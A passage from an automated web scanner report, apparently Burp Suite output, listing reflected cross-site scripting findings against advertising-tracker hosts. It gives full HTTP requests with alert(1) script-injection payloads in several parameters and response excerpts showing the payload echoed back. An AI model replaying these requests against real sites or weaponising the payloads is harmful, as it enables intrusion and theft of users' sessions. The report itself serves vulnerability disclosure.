Referer: http://c5.zedo.com/jsc/c5/ff2.html?n=496;c=121;s=1;d=14;w=728;h=90;p=;q=index&t=6201
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; 480-SM=adver_05-02-2011-12-46-04; 480-VT=adver_05-05-2011-00-58-41_6458910271304557121ZZZZaol_05-05-2011-12-43-39_11076048371304599419ZZZZadcon_05-06-2011-11-08-35_990492871304680115; SERVERID=s3

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 18:10:46 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_05-02-2011-12-46-04; expires=Tue, 10-May-2011 18:10:46 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=adver_05-05-2011-00-58-41_6458910271304557121ZZZZaol_05-05-2011-12-43-39_11076048371304599419ZZZZadcon_05-06-2011-11-08-35_990492871304680115ZZZZadver6ad07%3Cscript%3Ealert%281%29%3C%2Fscript%3Ed54a737c557_05-07-2011-18-10-46_15826757881304791846; expires=Thu, 05-May-2016 18:10:46 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=adver6ad07%3Cscript%3Ealert%281%29%3C%2Fscript%3Ed54a737c557_15826757881304791846; expires=Sat, 07-May-2011 18:25:46 GMT; path=/; domain=c3metrics.com
Content-Length: 6700
Connection: close
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
ar.c3VJScollection[a]=window.c3Vinter}else this.C3VTcallVar.c3VJScollection[a]=new c3VTJSInter();this.C3VTcallVar.c3VJScollection[a].loadNewP();this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnid='adver6ad07<script>alert(1)</script>d54a737c557';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJScid='480';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuid='13014572191303613803';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnuid='158267578813047
...[SNIP]...

5.3. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /c3VTabstrct-6-2.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 5990e<script>alert(1)</script>1abdce68969 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c3VTabstrct-6-2.php?id=adver&cid=480&t=72&rv=&uid=/5990e<script>alert(1)</script>1abdce68969&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://c5.zedo.com/jsc/c5/ff2.html?n=496;c=121;s=1;d=14;w=728;h=90;p=;q=index&t=6201
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; 480-SM=adver_05-02-2011-12-46-04; 480-VT=adver_05-05-2011-00-58-41_6458910271304557121ZZZZaol_05-05-2011-12-43-39_11076048371304599419ZZZZadcon_05-06-2011-11-08-35_990492871304680115; SERVERID=s3

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 18:11:03 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_05-02-2011-12-46-04; expires=Tue, 10-May-2011 18:11:03 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadcon_05-06-2011-11-08-35_990492871304680115ZZZZadver_05-07-2011-18-11-03_17122131801304791863; expires=Thu, 05-May-2016 18:11:03 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=adver_17122131801304791863; expires=Sat, 07-May-2011 18:26:03 GMT; path=/; domain=c3metrics.com
Content-Length: 6680
Connection: close
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
c3VJSnuid='17122131801304791863';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJStv='72';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuidSet='Y';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSrvSet='/5990e<script>alert(1)</script>1abdce68969';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSviewDelay='5000';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJScallurl=this.C3VTcallVar.c3VJScollection[a].C3VJSFindBaseurl(c3VTconsts.c3VJSconst.c3VJS
...[SNIP]...

5.4. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [rv parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /c3VTabstrct-6-2.php

Issue detail

The value of the rv request parameter is copied into the HTML document as plain text between tags. The payload d9236<script>alert(1)</script>a36a1dbb30c was submitted in the rv parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c3VTabstrct-6-2.php?id=adver&cid=480&t=72&rv=d9236<script>alert(1)</script>a36a1dbb30c&uid=&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://c5.zedo.com/jsc/c5/ff2.html?n=496;c=121;s=1;d=14;w=728;h=90;p=;q=index&t=6201
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; 480-SM=adver_05-02-2011-12-46-04; 480-VT=adver_05-05-2011-00-58-41_6458910271304557121ZZZZaol_05-05-2011-12-43-39_11076048371304599419ZZZZadcon_05-06-2011-11-08-35_990492871304680115; SERVERID=s3

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 18:10:51 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_05-02-2011-12-46-04; expires=Tue, 10-May-2011 18:10:51 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadcon_05-06-2011-11-08-35_990492871304680115ZZZZadver_05-07-2011-18-10-51_10220763251304791851; expires=Thu, 05-May-2016 18:10:51 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=adver_10220763251304791851; expires=Sat, 07-May-2011 18:25:51 GMT; path=/; domain=c3metrics.com
Content-Length: 6699
Connection: close
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
72191303613803';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnuid='10220763251304791851';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJStv='72';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuidSet='d9236<script>alert(1)</script>a36a1dbb30c';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSrvSet='Y';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSviewDelay='5000';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJScallurl=this.C3VTcallVar.c3VJSc
...[SNIP]...

5.5. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [t parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /c3VTabstrct-6-2.php

Issue detail

The value of the t request parameter is copied into the HTML document as plain text between tags. The payload f1122<script>alert(1)</script>7b17a05670a was submitted in the t parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c3VTabstrct-6-2.php?id=adver&cid=480&t=72f1122<script>alert(1)</script>7b17a05670a&rv=&uid=&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://c5.zedo.com/jsc/c5/ff2.html?n=496;c=121;s=1;d=14;w=728;h=90;p=;q=index&t=6201
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; 480-SM=adver_05-02-2011-12-46-04; 480-VT=adver_05-05-2011-00-58-41_6458910271304557121ZZZZaol_05-05-2011-12-43-39_11076048371304599419ZZZZadcon_05-06-2011-11-08-35_990492871304680115; SERVERID=s3

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 18:10:50 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_05-02-2011-12-46-04; expires=Tue, 10-May-2011 18:10:50 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadcon_05-06-2011-11-08-35_990492871304680115ZZZZadver_05-07-2011-18-10-50_15669854861304791850; expires=Thu, 05-May-2016 18:10:50 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=adver_15669854861304791850; expires=Sat, 07-May-2011 18:25:50 GMT; path=/; domain=c3metrics.com
Content-Length: 6700
Connection: close
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
his.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuid='13014572191303613803';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnuid='15669854861304791850';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJStv='72f1122<script>alert(1)</script>7b17a05670a';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuidSet='Y';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSrvSet='Y';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSviewDelay='5000';this.C3VTcallVar.c3V
...[SNIP]...

5.6. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [uid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /c3VTabstrct-6-2.php

Issue detail

The value of the uid request parameter is copied into the HTML document as plain text between tags. The payload df0c4<script>alert(1)</script>70a2cfc4d2b was submitted in the uid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c3VTabstrct-6-2.php?id=adver&cid=480&t=72&rv=&uid=df0c4<script>alert(1)</script>70a2cfc4d2b&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://c5.zedo.com/jsc/c5/ff2.html?n=496;c=121;s=1;d=14;w=728;h=90;p=;q=index&t=6201
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; 480-SM=adver_05-02-2011-12-46-04; 480-VT=adver_05-05-2011-00-58-41_6458910271304557121ZZZZaol_05-05-2011-12-43-39_11076048371304599419ZZZZadcon_05-06-2011-11-08-35_990492871304680115; SERVERID=s3

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 18:10:53 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_05-02-2011-12-46-04; expires=Tue, 10-May-2011 18:10:53 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadcon_05-06-2011-11-08-35_990492871304680115ZZZZadver_05-07-2011-18-10-53_16190831941304791853; expires=Thu, 05-May-2016 18:10:53 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=adver_16190831941304791853; expires=Sat, 07-May-2011 18:25:53 GMT; path=/; domain=c3metrics.com
Content-Length: 6679
Connection: close
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
.c3VJSnuid='16190831941304791853';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJStv='72';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuidSet='Y';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSrvSet='df0c4<script>alert(1)</script>70a2cfc4d2b';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSviewDelay='5000';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJScallurl=this.C3VTcallVar.c3VJScollection[a].C3VJSFindBaseurl(c3VTconsts.c3VJSconst.c3VJS
...[SNIP]...

5.7. http://480-adver-view.c3metrics.com/v.js [cid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /v.js

Issue detail

The value of the cid request parameter is copied into the HTML document as plain text between tags. The payload c5b46<script>alert(1)</script>8bcd363fa65 was submitted in the cid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v.js?id=adver&cid=480c5b46<script>alert(1)</script>8bcd363fa65&t=72 HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://c5.zedo.com/jsc/c5/ff2.html?n=496;c=121;s=1;d=14;w=728;h=90;p=;q=index&t=6201
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; 480-SM=adver_05-02-2011-12-46-04; 480-VT=adver_05-05-2011-00-58-41_6458910271304557121ZZZZaol_05-05-2011-12-43-39_11076048371304599419ZZZZadcon_05-06-2011-11-08-35_990492871304680115

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 18:11:14 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Content-Length: 1049
Connection: close
Content-Type: text/html
Set-Cookie: SERVERID=s13; path=/
Cache-control: private

if(!window.c3VTconstVal){c3VTconstVals={c3VJSconst:{c3VJSscriptLimit:0,c3VJScollection:new Array(),c3VJSurl:'v.js',c3VTJSurl:'c3VTabstrct-6-2.php'}};window.c3VTconstVal=c3VTconstVals}if(!window.fireC3VTJSobj){function fireC3VTJS(){this.fireCall=function(){var a=c3VTconstVal.c3VJSconst.c3VJSurl+'.*$';var b=c3VTconstVal.c3VJSconst.c3VTJSurl+"?id=adver&cid=480c5b46<script>alert(1)</script>8bcd363fa65&t=72&rv=&uid=&td=";var c=document.getElementsByTagName('script')[0];var e=document.createElement('script');e.type='text/javascript';e.async=true;e.src='http://480-adver-view.c3metrics.com/'+b;var r=ne
...[SNIP]...

5.8. http://480-adver-view.c3metrics.com/v.js [id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /v.js

Issue detail

The value of the id request parameter is copied into the HTML document as plain text between tags. The payload 96fa8<script>alert(1)</script>6358e20ce5f was submitted in the id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v.js?id=adver96fa8<script>alert(1)</script>6358e20ce5f&cid=480&t=72 HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://c5.zedo.com/jsc/c5/ff2.html?n=496;c=121;s=1;d=14;w=728;h=90;p=;q=index&t=6201
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; 480-SM=adver_05-02-2011-12-46-04; 480-VT=adver_05-05-2011-00-58-41_6458910271304557121ZZZZaol_05-05-2011-12-43-39_11076048371304599419ZZZZadcon_05-06-2011-11-08-35_990492871304680115

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 18:11:14 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Content-Length: 1049
Connection: close
Content-Type: text/html
Set-Cookie: SERVERID=s10; path=/
Cache-control: private

if(!window.c3VTconstVal){c3VTconstVals={c3VJSconst:{c3VJSscriptLimit:0,c3VJScollection:new Array(),c3VJSurl:'v.js',c3VTJSurl:'c3VTabstrct-6-2.php'}};window.c3VTconstVal=c3VTconstVals}if(!window.fireC3VTJSobj){function fireC3VTJS(){this.fireCall=function(){var a=c3VTconstVal.c3VJSconst.c3VJSurl+'.*$';var b=c3VTconstVal.c3VJSconst.c3VTJSurl+"?id=adver96fa8<script>alert(1)</script>6358e20ce5f&cid=480&t=72&rv=&uid=&td=";var c=document.getElementsByTagName('script')[0];var e=document.createElement('script');e.type='text/javascript';e.async=true;e.src='http://480-adver-view.c3metrics.com/'+b;
...[SNIP]...

5.9. http://480-adver-view.c3metrics.com/v.js [t parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /v.js

Issue detail

The value of the t request parameter is copied into the HTML document as plain text between tags. The payload 662f9<script>alert(1)</script>149c1c958ab was submitted in the t parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v.js?id=adver&cid=480&t=72662f9<script>alert(1)</script>149c1c958ab HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://c5.zedo.com/jsc/c5/ff2.html?n=496;c=121;s=1;d=14;w=728;h=90;p=;q=index&t=6201
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; 480-SM=adver_05-02-2011-12-46-04; 480-VT=adver_05-05-2011-00-58-41_6458910271304557121ZZZZaol_05-05-2011-12-43-39_11076048371304599419ZZZZadcon_05-06-2011-11-08-35_990492871304680115

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 18:11:15 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Content-Length: 1049
Connection: close
Content-Type: text/html
Set-Cookie: SERVERID=s12; path=/
Cache-control: private

if(!window.c3VTconstVal){c3VTconstVals={c3VJSconst:{c3VJSscriptLimit:0,c3VJScollection:new Array(),c3VJSurl:'v.js',c3VTJSurl:'c3VTabstrct-6-2.php'}};window.c3VTconstVal=c3VTconstVals}if(!window.fireC3VTJSobj){function fireC3VTJS(){this.fireCall=function(){var a=c3VTconstVal.c3VJSconst.c3VJSurl+'.*$';var b=c3VTconstVal.c3VJSconst.c3VTJSurl+"?id=adver&cid=480&t=72662f9<script>alert(1)</script>149c1c958ab&rv=&uid=&td=";var c=document.getElementsByTagName('script')[0];var e=document.createElement('script');e.type='text/javascript';e.async=true;e.src='http://480-adver-view.c3metrics.com/'+b;var r=new Reg
...[SNIP]...

5.10. http://ad.adlegend.com/jscript [@CPSC@ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.adlegend.com
Path:   /jscript

Issue detail

The value of the @CPSC@ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 820fb'%3balert(1)//e1423ad6361 was submitted in the @CPSC@ parameter. This input was echoed as 820fb';alert(1)//e1423ad6361 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jscript?spacedesc=2122025_1080850_300x160_1111357_2122025&ML_NIF=N&target=_blank&@CPSC@=820fb'%3balert(1)//e1423ad6361 HTTP/1.1
Host: ad.adlegend.com
Proxy-Connection: keep-alive
Referer: http://www.nbcconnecticut.com/news/politics/Malloys-Plan-B-Cuts-4700-State-Jobs---121401459.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PrefID=43-847748576; CSList=1090846/1088030,0/0,0/0,0/0,0/0

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 22:37:45 GMT
Server: Apache/1.3.37 (Unix)
Cache-Control: no-cache, must-revalidate
Expires: Tue, 1 Jan 1970 01:01:01 GMT
Pragma: no-cache
P3P: policyref="http://ad.adlegend.com/p3p.xml", CP="BUS COM COR DEVa DSP NAV NOI OUR PRE STA TAIa UNI"
Set-Cookie: PrefID=43-847748576; expires=Tue, 07 May 2013 10:37:45 GMT; path=/; domain=.adlegend.com
Set-Cookie: CSList=1076702/1080850,1090846/1088030,0/0,0/0,0/0; expires=Fri, 05 Aug 2011 22:37:45 GMT; path=/; domain=.adlegend.com
Content-Type: application/x-javascript
Content-Length: 444
Connection: close

document.write('<A HREF="http://ad.adlegend.com/click.ng?spacedesc=2122025_1080850_300x160_1111357_2122025&af=2095360&ml_pkgkw=-%253A%2522%2522&ml_pbi=-2122025&ml_camp=1076702&ml_crid=2127402&click=820fb';alert(1)//e1423ad6361http://www.nbc.com/the-apprentice/" TARGET="_blank">
...[SNIP]...

5.11. http://ad.adlegend.com/jscript [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.adlegend.com
Path:   /jscript

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 89b76'-alert(1)-'aee1add2168 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jscript?spacedesc=2122025_1080850_300x160_1111357_2122025&ML_NIF=N&target=_blank&@CPSC@=&89b76'-alert(1)-'aee1add2168=1 HTTP/1.1
Host: ad.adlegend.com
Proxy-Connection: keep-alive
Referer: http://www.nbcconnecticut.com/news/politics/Malloys-Plan-B-Cuts-4700-State-Jobs---121401459.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PrefID=43-847748576; CSList=1090846/1088030,0/0,0/0,0/0,0/0

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 22:37:45 GMT
Server: Apache/1.3.37 (Unix)
Cache-Control: no-cache, must-revalidate
Expires: Tue, 1 Jan 1970 01:01:01 GMT
Pragma: no-cache
